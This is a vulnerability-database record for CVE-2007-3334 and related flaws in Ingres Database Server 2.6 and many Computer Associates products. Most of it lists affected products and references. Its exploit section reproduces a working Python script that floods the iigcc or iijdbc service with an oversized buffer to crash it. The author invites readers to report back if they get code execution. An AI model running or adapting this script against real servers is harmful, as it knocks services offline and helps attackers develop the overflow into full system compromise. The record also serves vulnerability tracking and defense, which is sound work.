ID
VAR-E-200706-0107
CVE
cve_id: | CVE-2007-3334 | Trust: 2.4 |
cve_id: | CVE-2007-3338 | Trust: 0.8 |
cve_id: | CVE-2007-3337 | Trust: 0.8 |
cve_id: | CVE-2007-3336 | Trust: 0.8 |
EDB ID
30224
TITLE
Ingress Database Server 2.6 - Multiple Remote Vulnerabilities - Windows dos Exploit
Trust: 0.6
DESCRIPTION
Ingress Database Server 2.6 - Multiple Remote Vulnerabilities. CVE-2007-3334, CVE-37487. DoS exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | ingress | model: | database server | scope: | eq | version: | 2.6 | Trust: 1.6 |
vendor: | computer | model: | associates advantage ingres | scope: | eq | version: | 2.6 | Trust: 0.5 |
vendor: | ingres | model: | database | scope: | eq | version: | 20060 | Trust: 0.3 |
vendor: | ingres | model: | database | scope: | eq | version: | 3.0.3 | Trust: 0.3 |
vendor: | ingres | model: | database | scope: | eq | version: | 2.6 | Trust: 0.3 |
vendor: | ingres | model: | database | scope: | eq | version: | 2.5 | Trust: 0.3 |
vendor: | computer | model: | associates wily soa manager | scope: | eq | version: | 7.1 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter workload control center 1.0.sp4 | scope: | - | version: | - | Trust: 0.3 |
vendor: | computer | model: | associates unicenter workload control center sp4 | scope: | eq | version: | 1.0 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter tng | scope: | eq | version: | 2.4.2 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter tng | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter tng 2.4.2j | scope: | - | version: | - | Trust: 0.3 |
vendor: | computer | model: | associates unicenter software delivery | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter serviceplus service desk | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter serviceplus service desk sp1 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter serviceplus service desk sp3 | scope: | eq | version: | 5.5 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter serviceplus service desk | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter serviceplus service desk | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter serviceplus service desk | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service metric analysis | scope: | eq | version: | 3.5 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service metric analysis | scope: | eq | version: | 3.0.2 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service metric analysis | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service metric analysis | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service intelligence | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service delivery | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service delivery | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service catalog | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service assure | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service assure | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service assure | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter remote control | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter remote control | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter patch management | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter network and systems management | scope: | eq | version: | 3.1 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter network and systems management | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter network and systems management | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter management portal | scope: | eq | version: | 3.1.1 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter lightweight portal | scope: | eq | version: | 2 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter job management option | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter enterprise job manager sp4 | scope: | eq | version: | 1.0 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter enterprise job manager sp3 | scope: | eq | version: | 1.0 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter desktop management suite | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter desktop and server management | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter database command center | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter ca web services distributed management | scope: | eq | version: | 3.5 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter ca web services distributed management | scope: | eq | version: | 3.11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter asset portfolio management | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter asset portfolio management | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter asset portfolio management | scope: | eq | version: | 11.3 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter asset management | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter asset intelligence | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter advanced systems management | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates etrust web access control | scope: | eq | version: | 1.0 | Trust: 0.3 |
vendor: | computer | model: | associates etrust single sign-on | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | computer | model: | associates etrust single sign-on | scope: | eq | version: | 8 | Trust: 0.3 |
vendor: | computer | model: | associates etrust single sign-on | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | computer | model: | associates etrust secure content manager | scope: | eq | version: | 8.0 | Trust: 0.3 |
vendor: | computer | model: | associates etrust network forensics | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | computer | model: | associates etrust identity manager | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | computer | model: | associates etrust iam toolkit | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | computer | model: | associates etrust iam toolkit | scope: | eq | version: | 8 | Trust: 0.3 |
vendor: | computer | model: | associates etrust iam suite | scope: | eq | version: | 8 | Trust: 0.3 |
vendor: | computer | model: | associates etrust directory | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | computer | model: | associates etrust audit r8 | scope: | - | version: | - | Trust: 0.3 |
vendor: | computer | model: | associates etrust admin | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | computer | model: | associates etrust admin | scope: | eq | version: | 8.0 | Trust: 0.3 |
vendor: | computer | model: | associates etrust admin sp2 | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | computer | model: | associates etrust admin sp1 | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | computer | model: | associates docserver | scope: | eq | version: | 1.1 | Trust: 0.3 |
vendor: | computer | model: | associates cleverpath predictive analysis server | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | computer | model: | associates cleverpath aion bre | scope: | eq | version: | 10.1 | Trust: 0.3 |
vendor: | computer | model: | associates cleverpath aion bpm | scope: | eq | version: | 10.1 | Trust: 0.3 |
vendor: | computer | model: | associates ccs | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates brightstor storage resource manager | scope: | eq | version: | 11.5 | Trust: 0.3 |
vendor: | computer | model: | associates brightstor storage command center | scope: | eq | version: | 11.5 | Trust: 0.3 |
vendor: | computer | model: | associates brightstor enterprise backup for tru64 | scope: | eq | version: | 10.5 | Trust: 0.3 |
vendor: | computer | model: | associates brightstor enterprise backup for solaris | scope: | eq | version: | 10.5 | Trust: 0.3 |
vendor: | computer | model: | associates brightstor enterprise backup for hp | scope: | eq | version: | 10.5 | Trust: 0.3 |
vendor: | computer | model: | associates brightstor enterprise backup for aix | scope: | eq | version: | 10.5 | Trust: 0.3 |
vendor: | computer | model: | associates brightstor arcserve backup for linux | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | computer | model: | associates brightstor arcserve backup for linux | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | computer | model: | associates brightstor arcserve backup | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | computer | model: | associates brightstor arcserve backup | scope: | eq | version: | 11.5 | Trust: 0.3 |
vendor: | computer | model: | associates arcserve backup for laptops and desktops | scope: | eq | version: | 11.5 | Trust: 0.3 |
vendor: | computer | model: | associates allfusion harvest change manager | scope: | eq | version: | 7.1 | Trust: 0.3 |
vendor: | computer | model: | associates allfusion harvest change manager | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | computer | model: | associates allfusion enterprise workbench | scope: | eq | version: | 7.1 | Trust: 0.3 |
vendor: | computer | model: | associates allfusion enterprise workbench | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | computer | model: | associates allfusion enterprise workbench sp1 | scope: | eq | version: | 1.1 | Trust: 0.3 |
vendor: | computer | model: | associates allfusion enterprise workbench | scope: | eq | version: | 1.1 | Trust: 0.3 |
vendor: | computer | model: | associates advantage data transformer | scope: | eq | version: | 2.2 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/24585/info
Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue.
Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.
# Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
# Date: 2010-08-14
# Author: fdisk
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
# Notes: Fixed in the last version.
# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com>
import socket
import sys

if len(sys.argv) != 4:
    print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"
    print "Vulnerable Services: iigcc, iijdbc"
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
service = sys.argv[3]

if service == "iigcc":
    payload = "\x41" * 2106
elif service == "iijdbc":
    payload = "\x41" * 1066
else:
    print "Vulnerable Services: iigcc, iijdbc"
    sys.exit(1)

payload += "\x42" * 4

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
data = s.recv(1024)
s.close()
print 'Received', repr(data)
print service + " crashed"
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Multiple Remote Vulnerabilities
Trust: 1.6
TAGS
tag: | exploit | Trust: 0.5 |
tag: | denial of service | Trust: 0.5 |
tag: | vulnerability | Trust: 0.5 |
CREDITS
anonymous
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2007-3334 | Trust: 2.4 |
db: | EXPLOIT-DB | id: | 30224 | Trust: 1.9 |
db: | BID | id: | 24585 | Trust: 1.9 |
db: | NVD | id: | CVE-2007-3338 | Trust: 0.8 |
db: | NVD | id: | CVE-2007-3337 | Trust: 0.8 |
db: | NVD | id: | CVE-2007-3336 | Trust: 0.8 |
db: | EDBNET | id: | 51927 | Trust: 0.6 |
db: | PACKETSTORM | id: | 92818 | Trust: 0.5 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2007-3334 | Trust: 2.1 |
url: | https://www.securityfocus.com/bid/24585/info | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/30224/ | Trust: 0.6 |
url: | https://nvd.nist.gov/vuln/detail/cve-2007-3336 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2007-3338 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2007-3337 | Trust: 0.5 |
url: | http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/ | Trust: 0.3 |
url: | http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp | Trust: 0.3 |
url: | http://www.ingres.com/ | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/30224 | Trust: 0.3 |
url: | http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546 | Trust: 0.3 |
url: | http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778 | Trust: 0.3 |
SOURCES
db: | BID | id: | 24585 |
db: | PACKETSTORM | id: | 92818 |
db: | EXPLOIT-DB | id: | 30224 |
db: | EDBNET | id: | 51927 |
LAST UPDATE DATE
2022-07-27T09:48:33.447000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 24585 | date: | 2015-03-19T08:36:00 |
SOURCES RELEASE DATE
db: | BID | id: | 24585 | date: | 2007-06-21T00:00:00 |
db: | PACKETSTORM | id: | 92818 | date: | 2010-08-17T01:35:50 |
db: | EXPLOIT-DB | id: | 30224 | date: | 2007-06-21T00:00:00 |
db: | EDBNET | id: | 51927 | date: | 2007-06-21T00:00:00 |